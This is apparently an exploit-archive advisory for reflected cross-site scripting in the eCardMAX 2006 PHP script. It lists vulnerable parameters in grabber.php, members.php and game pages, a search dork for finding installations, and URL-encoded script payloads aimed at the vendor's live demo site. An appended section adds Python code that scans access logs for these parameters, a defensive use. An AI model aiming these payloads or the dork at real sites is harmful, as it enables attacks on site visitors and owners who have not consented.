###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                   _      _       _          _      _   _
                  / \    | |     | |        / \    | | | |
                 / _ \   | |     | |       / _ \   | |_| |
                / ___ \  | |___  | |___   / ___ \  |  _  |
IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|

==============================================================================
       [»]  [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
       [»]  eCardMAX 2006 Remote XSS vulnerability
==============================================================================

 [»] Script:      [ eCardMAX 2006 ]
 [»] Language:    [ PHP ]
 [»] Download:    [ http://ecardmax.com/index.php?step=Invitation ]
 [»] Founder:     [ Moudi ]
 [»] Thanks to:   [ MiZoZ , ZuKa , str0ke , 599em Man...]
 [»] Team:        [ EvilWay ]
 [»] Dork:        [ Powered by eCardMAX 2006 ]
 [»] Price:       [ $99.95 ]

###########################################################################

===[ Exploit XSS vulnerability ]===

 [»] http://www.site.com/patch/resource/games/ephotohunt/ephotohunt.php?step=show_ins&cat=[XSS]
 [»] http://www.site.com/patch/grabber.php?grab_url=[XSS]
 [»] http://www.site.com/patch/members.php?cs_message=[XSS]

===[ Exploit DEMO ONLINE ]===

 [»] http://ecardmax.com/standard_2006/grabber.php?grab_url=
     XSS TO ADD: 1%3Cscript%3Ealert(1192520984065)%3C/script%3E

 [»] http://ecardmax.com/standard_2006/members.php?cs_message=
     XSS TO ADD: 1%3C/textarea%3E%3CScRiPt%20%0A%0D%3Ealert(846719933916)%3B%3C/ScRiPt%3E

 [»] http://ecardmax.com/standard_2006/resource/games/memory/memory.php?step=show_ins&cat=
     XSS TO ADD: 1%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(1295561226285)%3B%3C/ScRiPt%3E

Author: Moudi

###########################################################################
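
Detection logic for the scripts and parameters listed above, added here as an example and not part of the original advisory: it scans web-server access-log lines and flags requests where a listed parameter decodes to HTML markup, including double-encoded values. The log lines are constructed samples; the combined log format and the /ecard/ install path are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script file -> query parameter, as listed in the advisory.
WATCHED = {
    "grabber.php": "grab_url",
    "members.php": "cs_message",
    "ephotohunt.php": "cat",
    "memory.php": "cat",
}
# An opening/closing tag or a quote-then-bracket breakout in the decoded value.
MARKUP = re.compile(r'<\s*/?\s*[a-z]|["\']\s*>', re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, hypothetical /ecard/ path).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /ecard/grabber.php?grab_url=1%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /ecard/members.php?cs_message=hello%20world HTTP/1.1" 200 734',
    '198.51.100.7 - - [01/Jan/2024:10:01:10 +0000] "GET /ecard/resource/games/memory/memory.php?step=show_ins&cat=1%253E%2522%253E%253CScRiPt%253E HTTP/1.1" 200 420',
    '198.51.100.7 - - [01/Jan/2024:10:01:15 +0000] "GET /ecard/index.php?step=Invitation HTTP/1.1" 200 900',
]


def suspicious_requests(log_lines):
    """Return (script, parameter, decoded value) for each flagged request."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        param = WATCHED.get(script)
        if param is None:
            continue
        # parse_qs percent-decodes once; unquote again to catch double encoding.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            decoded = unquote(value)
            if MARKUP.search(decoded):
                hits.append((script, param, decoded))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Only values carried in the request line are visible to this check; parameters sent in a POST body do not appear in a standard access log.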